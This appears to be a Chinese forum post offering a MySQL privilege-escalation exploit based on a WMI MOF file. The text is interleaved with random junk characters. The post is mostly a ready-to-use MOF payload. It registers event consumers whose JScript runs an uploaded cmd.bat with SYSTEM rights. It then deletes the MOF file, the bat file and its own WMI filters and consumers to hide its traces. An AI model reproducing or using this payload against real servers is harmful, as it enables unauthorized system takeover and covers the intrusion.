Mysql 提权即时无错Mof exp

admin

这个sql提权MOF需要运行 system下的文件，不能定义路径。
需要将要运行的命令写入到bat上传到system32目录，然后执行。

  q: ^& O' g3 j$ J; Z这个sql提权MOF需要运行 system下的文件，不能定义路径。
' v# q6 v7 e& [7 b; `: j需要将要运行的命令写入到bat上传到system32目录，然后执行。

#pragma
. |+ ?6 u& n3 E+ z9 }                        namespace("\\\\.\\root\\cimv2")
                        class
                        MyClass547
) s6 D1 q' w. Z& P! Z) ~3 d; Q                        {           [key]
                        string
5 P% O/ a; A7 U, N6 H: E, Q                        Name;
                        };
                        class
                        ActiveScriptEventConsumer
                        : __EventConsumer {          [key]
4 l+ [* b* |8 d8 w                        string
                        Name;           [not_null]
                        string
                        ScriptingEngine;           string
                        ScriptFileName;           [template]
0 A! u" k) S# W                        string
3 l* a$ k" c+ L9 @                        ScriptText;         uint32 KillTimeout;
                        }; instance of __Win32Provider as $P {
                        Name
  Y$ c5 P- v7 x% n                        =
5 [% U1 J* v. e: _; @* d                        "ActiveScriptEventConsumer";     CLSID =
0 c# ~, Z- h, Y. W0 k/ Y. H                        "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
                        PerUserInitialization
                        = TRUE;
                        }; instance of __EventConsumerProviderRegistration {         Provider
: B6 i- o( i+ P0 Y4 }) b                        = $P;         ConsumerClassNames
7 a9 N# D7 @  |+ x6 p" ?  X+ v                        =
                        {"ActiveScriptEventConsumer"};
" d- N# m/ [' n2 y                        };
5 i! q# L$ i3 ?; o+ o, A( T                        Instance of ActiveScriptEventConsumer
                        as $cons {         Name
6 `: A: j9 }7 r2 }5 R" M# i; y; s                        =
7 @% q" i  G( \5 E                        "ASEC";         ScriptingEngine
, E& E7 [8 a( c/ n3 _; P0 X                        =
0 _2 `7 z$ V+ X                        "JScript";         ScriptText
7 S0 X  ^  O. h/ s% T                        =
                        "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";          };
                        Instance of ActiveScriptEventConsumer
                        as $cons2 {         Name
+ D7 Z; C/ c7 \. H8 m                        =
; W4 D* \8 [" K. l; q5 J/ Y$ Z                        "qndASEC";         ScriptingEngine
8 Z# h- E5 z- [8 W& C% K& @                        =
- l/ n0 j. O5 x$ Y* v                        "JScript";         ScriptText
+ w; O6 T$ l' N- r( C7 D% C                        =
                        "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
                        }; instance of __EventFilter as $Filt {         Name
8 h; H2 _$ P4 V8 [                        =
5 A1 v: h$ r. b- }' v1 H3 ^. s                        "instfilt";         Query
; W+ }  S! r5 M. L1 g5 M3 x                        =
" d1 x' A' G; r4 q                        "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\"";         QueryLanguage
: b; Q# {9 i1 C: D( T7 X                        =
                        "WQL";         }; instance of __EventFilter as $Filt2 {         Name
% f% D  k% Z3 T4 o& n3 f                        =
                        "qndfilt";         Query
2 g, l- f. H# Q7 i) v                        =
                        "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\"";         QueryLanguage
/ K' E  N! N+ X. G: z) V3 T) {                        =
" a1 L0 E4 I) a" I+ ?) Z                        "WQL";          }; instance of __FilterToConsumerBinding as $bind {         Consumer
                        = $cons;         Filter
                        = $Filt;
                        }; instance of __FilterToConsumerBinding as $bind2 {         Consumer
                        = $cons2;         Filter
                        = $Filt2;
                        }; instance of MyClass547
                        as $MyClass {         Name
                        =
                        "ClassConsumer";
$ u& `  m: o4 _4 s                        };